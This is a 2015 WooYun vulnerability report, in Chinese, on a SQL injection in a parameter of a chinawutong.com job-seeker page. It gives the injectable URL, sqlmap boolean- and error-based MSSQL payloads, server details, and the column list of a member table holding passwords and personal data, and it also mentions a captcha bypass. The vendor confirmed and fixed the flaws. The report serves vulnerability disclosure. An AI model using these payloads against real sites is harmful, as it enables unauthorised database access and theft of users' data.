当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0161534

漏洞标题:中国物通分站SQL注入一处

相关厂商:中国物通网

漏洞作者: tr33

提交时间:2015-12-15 16:19

修复时间:2016-01-04 14:45

公开时间:2016-01-04 14:45

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:8

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-15: 细节已通知厂商并且等待厂商处理中
2015-12-15: 厂商已经确认,细节仅向厂商公开
2015-12-25: 细节向核心白帽子及相关领域专家公开
2016-01-04: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

中国物通分站SQL注入一处,可以获取大量用户的个人信息。

详细说明:

注入点:
http://hr.chinawutong.com/qiuzhi/p1/?p=0%27&pv=

start.PNG


hr.chinawutong.com/qiuzhi/p1/?p=0 and email=1&pv=

sqli1.PNG


使用sqlmap跑出当前用户,库名,表名等信息。可以直接脱裤,但由于速度慢的关系没有进一步测试:

dbs.PNG


users.PNG


huiyuan.PNG


Place: GET
Parameter: p
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: p=0 AND 1958=1958&pv=
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: p=0 AND 746=CONVERT(INT,(CHAR(58)+CHAR(120)+CHAR(115)+CHAR(99)+CHAR(58)+(SELECT (CASE W
HEN (746=746) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(112)+CHAR(99)+CHAR(99)+CHAR(58)))&pv=
---
[15:39:03] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
Database: wutong
Table: dbo.huiyuan
[50 columns]
+-----------------+----------+
| Column          | Type     |
+-----------------+----------+
| beiannum        | bit      |
| ChengxinState   | bit      |
| cishu           | bit      |
| CloseVipmidTime | bit      |
| CloseVipTime    | bit      |
| co              | bit      |
| CurrentPosition | bit      |
| cust_kind       | bit      |
| cust_name       | bit      |
| cust_pass       | bit      |
| domain          | bit      |
| email           | bit      |
| GpsLoginNum     | bit      |
| id              | bit      |
| ipviptime       | bit      |
| Ispromoter      | bit      |
| Issample        | bit      |
| logintime       | bit      |
| num             | bit      |
| OpenID          | bit      |
| OpenVipmidTime  | bit      |
| OpenVipTime     | bit      |
| pass_answer     | bit      |
| pass_note       | bit      |
| price           | bit      |
| Recommend       | bit      |
| Recommend1      | bit      |
| score           | bit      |
| scoreGive       | bit      |
| SoftNum         | bit      |
| stylename       | bit      |
| time            | bit      |
| truename        | bit      |
| url             | bit      |
| Verify          | bit      |
| vip             | bit      |
| vipmid          | bit      |
| VLevel          | bit      |
| vnum            | bit      |
| vtype           | bit      |
| vyear           | bit      |
| wanshanRen      | bit      |
| WapNum          | bit      |
| WebSite         | bit      |
| WebSite1        | bit      |
| WXTNumber       | bit      |
| yuangong        | bit      |
| zcrtel          | bit      |
| zhuangtai       | bit      |
| zhuceren        | nvarchar |
+-----------------+----------+


附赠一个设计缺陷:
验证码存在了cookie,只是前段验证了一下,可以直接绕过验证码。

漏洞证明:

可参考详细说明

sqli1.PNG


huiyuan.PNG

修复方案:

你们有这方面的经验的

版权声明:转载请注明来源 tr33@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-12-15 17:18

厂商回复:

感谢反馈

最新状态:

2016-01-04:感谢反馈 已修复